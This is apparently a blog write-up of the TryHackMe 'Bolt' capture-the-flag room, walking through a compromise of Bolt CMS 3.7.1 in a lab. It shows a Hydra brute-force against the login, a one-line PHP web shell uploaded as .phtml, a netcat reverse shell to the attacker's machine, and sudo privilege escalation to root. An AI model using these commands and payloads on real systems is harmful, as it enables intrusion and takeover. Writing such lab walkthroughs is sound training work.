In this blog post, I'll share my experience solving the "Bolt" challenge on TryHackMe, which involves exploiting a vulnerable Content Management System (CMS) to gain root access. This challenge emphasizes the importance of keeping software up-to-date and highlights the risks associated with outdated CMS platforms.
The primary vulnerability in this challenge is an Authenticated Remote Code Execution (RCE) in the Bolt CMS version 3.7.1. This vulnerability allows authenticated users to execute arbitrary code on the server due to improper handling of file uploads. In real-world scenarios, such vulnerabilities can lead to complete system compromise, data breaches, and unauthorized access to sensitive information.
I began by deploying the target machine and identifying its IP address. Using Nmap, I scanned for open ports and services:
nmap -sC -sV -oN nmap_scan.txt <target_ip>
The scan revealed the following open ports:
Port 22 (SSH): OpenSSH 7.6p1
Port 80 (HTTP): Apache httpd 2.4.29
With HTTP service running on port 80, I navigated to the web server in my browser and discovered the default Apache page. To find hidden directories, I used Gobuster:
gobuster dir -u http://<target_ip>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
The scan revealed a /bolt directory, which led me to the Bolt CMS login page.
Identifying the Bolt CMS VersionTo determine the CMS version, I checked the page source and found a meta tag indicating version 3.7.1:
<meta name="generator" content="Bolt 3.7.1">
Knowing the version, I searched for known vulnerabilities and found an authenticated RCE exploit for Bolt CMS 3.7.1.
Obtaining Credentials
I attempted default credentials such as admin:admin and admin:password but was unsuccessful. I then used Hydra to perform a brute-force attack:
hydra -L usernames.txt -P passwords.txt <target_ip> http-post-form "/bolt/login:username=^USER^&password=^PASS^:Invalid login" -V
After some time, I discovered valid credentials:
Username: admin
Password: boltadmin123
Exploiting Authenticated RCE
After logging in, I navigated to the "Files" section to upload a malicious PHP file. However, the CMS restricted PHP uploads. To bypass this, I uploaded a .phtml file containing a simple PHP web shell:
<?php system($_GET['cmd']); ?>
Once uploaded, I accessed the shell via:
http://<target_ip>/files/shell.phtml?cmd=whoami
The command executed successfully, confirming RCE.
To gain a more interactive shell, I set up a listener on my machine:
nc -lvnp 4444
Then, I executed the following command through the web shell:
http://<target_ip>/files/shell.phtml?cmd=nc -e /bin/bash <your_ip> 4444
This provided me with a reverse shell as the www-data user.
Privilege EscalationTo escalate privileges, I checked for users on the system and found a user named bolt. I searched for SUID binaries and found that /usr/bin/sudo had the SUID bit set. Checking the sudoers file, I discovered that the www-data user could execute /bin/bash as bolt without a password:
sudo -u bolt /bin/bash
This command provided a shell as the bolt user. In the bolt user's home directory, I found an SSH key, which I used to log in as bolt via SSH.
As the bolt user, I checked for sudo privileges:
sudo -l
The output indicated that bolt could execute all commands as root without a password. I then spawned a root shell: sudo -i
With root access, I navigated to the /root directory and retrieved the root flag.